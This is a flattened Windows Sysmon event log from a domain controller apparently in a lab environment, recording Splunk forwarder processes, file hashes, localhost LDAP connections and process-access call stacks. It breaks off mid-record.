23542300x80000000000000002201652Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:59:56.184{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=524C89E6CE9A638927609D49BD5C51C0,SHA256=2DE899FA13E656A6050DDC2DB147251B7FFAD4D2DEFCD99619B9BA03C022AE46,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002201655Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:59:57.246{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=ED4866818ACF4CA979AE5AEE52237912,SHA256=BBE786E589FED877DD414E17BBE6EAB05752E54E27F23C2904083BC79E8B846A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002201654Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:59:57.246{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=AF838909C997F766344CCC6BEB40299D,SHA256=BFA2C812E9628823244CD93AC085B447FA5BEFFB2F9E1DA2B4977A3E8584C37F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002201653Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:59:57.215{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=980319806AB57DADFD22899F4A14C443,SHA256=FB7AEC41F06B03953ABBFF2CF6296CF0F1E204FB3B6F24D653B5ECA082BE8959,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002201659Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:59:58.215{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=18746F4E8187D7B628A1967CB6A18ECB,SHA256=C9F0C12AE0E5F61C376FFF798C10CE2138EF40BC109E29D439CAF74BED5BFE52,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002201658Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:59:53.879{5ABCFE62-84AA-603E-D300-00000000AD01}3788C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-228.attackrange.local55236-false10.0.1.12-8000- 354300x80000000000000002201657Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:59:53.864{5ABCFE62-842D-603E-0B00-00000000AD01}632C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetrue0:0:0:0:0:0:0:1win-dc-228.attackrange.local55235-true0:0:0:0:0:0:0:1win-dc-228.attackrange.local389ldap 354300x80000000000000002201656Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:59:53.864{5ABCFE62-843F-603E-3000-00000000AD01}2464C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exeNT AUTHORITY\SYSTEMtcptruetrue0:0:0:0:0:0:0:1win-dc-228.attackrange.local55235-true0:0:0:0:0:0:0:1win-dc-228.attackrange.local389ldap 23542300x80000000000000002201661Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:59:59.246{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=453D72A79232FA33193B7E0ED4BB0BA2,SHA256=BD7D9ACB5B9952A7D01EC3303C776183D347BA46F62185524E21C6DD0042A8C0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002201660Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:59:59.075{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=ED4866818ACF4CA979AE5AEE52237912,SHA256=BBE786E589FED877DD414E17BBE6EAB05752E54E27F23C2904083BC79E8B846A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002201662Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:00:00.278{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C2285816B709C2891F1C3DED60C14306,SHA256=D8C67ECD64D676E1ECD26F62C6B7F27E123340E839C1D6CC90B578BDAA6B9F27,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002201663Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:00:01.309{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6959293F7E68B313A38F3B49011B4533,SHA256=729974E161FA7F99C07D70C288EFEAC02BEFAF891C4CA71398B4168A54CB32D7,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002201682Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:00:02.903{5ABCFE62-84A3-603E-A900-00000000AD01}49124704C:\Windows\system32\conhost.exe{5ABCFE62-E7E2-6040-0A4E-00000000AD01}4584C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002201681Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:00:02.903{5ABCFE62-842F-603E-0C00-00000000AD01}8525700C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002201680Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:00:02.903{5ABCFE62-842F-603E-0C00-00000000AD01}8525700C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002201679Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:00:02.903{5ABCFE62-842F-603E-0C00-00000000AD01}8525700C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002201678Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:00:02.903{5ABCFE62-842F-603E-0C00-00000000AD01}8525700C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002201677Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:00:02.903{5ABCFE62-842D-603E-0500-00000000AD01}416340C:\Windows\system32\csrss.exe{5ABCFE62-E7E2-6040-0A4E-00000000AD01}4584C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002201676Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:00:02.903{5ABCFE62-84A2-603E-A500-00000000AD01}28764504C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{5ABCFE62-E7E2-6040-0A4E-00000000AD01}4584C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000002201675Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:00:02.903{5ABCFE62-E7E2-6040-0A4E-00000000AD01}4584C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{5ABCFE62-842D-603E-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{5ABCFE62-84A2-603E-A500-00000000AD01}2876C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000002201674Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:00:02.356{5ABCFE62-E7E2-6040-094E-00000000AD01}6112688C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{5ABCFE62-84A2-603E-A500-00000000AD01}2876C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000002201673Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:00:02.309{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CD958E5574A8292F38C7B31BC3F0D098,SHA256=AE8FBD41D0DD84618E480F93B7E1A623FCED5BBC68DFEA3462276F93FF152098,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002201672Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:00:02.231{5ABCFE62-84A3-603E-A900-00000000AD01}49124704C:\Windows\system32\conhost.exe{5ABCFE62-E7E2-6040-094E-00000000AD01}6112C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002201671Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:00:02.231{5ABCFE62-842F-603E-0C00-00000000AD01}8525700C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002201670Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:00:02.231{5ABCFE62-842F-603E-0C00-00000000AD01}8525700C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002201669Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:00:02.231{5ABCFE62-842F-603E-0C00-00000000AD01}8525700C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002201668Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:00:02.231{5ABCFE62-842F-603E-0C00-00000000AD01}8525700C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002201667Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:00:02.231{5ABCFE62-842D-603E-0500-00000000AD01}416340C:\Windows\system32\csrss.exe{5ABCFE62-E7E2-6040-094E-00000000AD01}6112C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002201666Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:00:02.231{5ABCFE62-84A2-603E-A500-00000000AD01}28764504C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{5ABCFE62-E7E2-6040-094E-00000000AD01}6112C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000002201665Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:00:02.231{5ABCFE62-E7E2-6040-094E-00000000AD01}6112C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{5ABCFE62-842D-603E-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{5ABCFE62-84A2-603E-A500-00000000AD01}2876C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000002201664Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:00:02.231{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=F34F89F206665C04D6AD38BBD4B3FDA6,SHA256=EBF81D0283D9B9C56727C4E415B0349C3E0E198767538AAB1D2D88A72F7D74D6,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002201693Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:00:03.559{5ABCFE62-84A3-603E-A900-00000000AD01}49124704C:\Windows\system32\conhost.exe{5ABCFE62-E7E3-6040-0B4E-00000000AD01}4060C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002201692Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:00:03.559{5ABCFE62-842F-603E-0C00-00000000AD01}8525700C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002201691Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:00:03.559{5ABCFE62-842F-603E-0C00-00000000AD01}8525700C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002201690Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 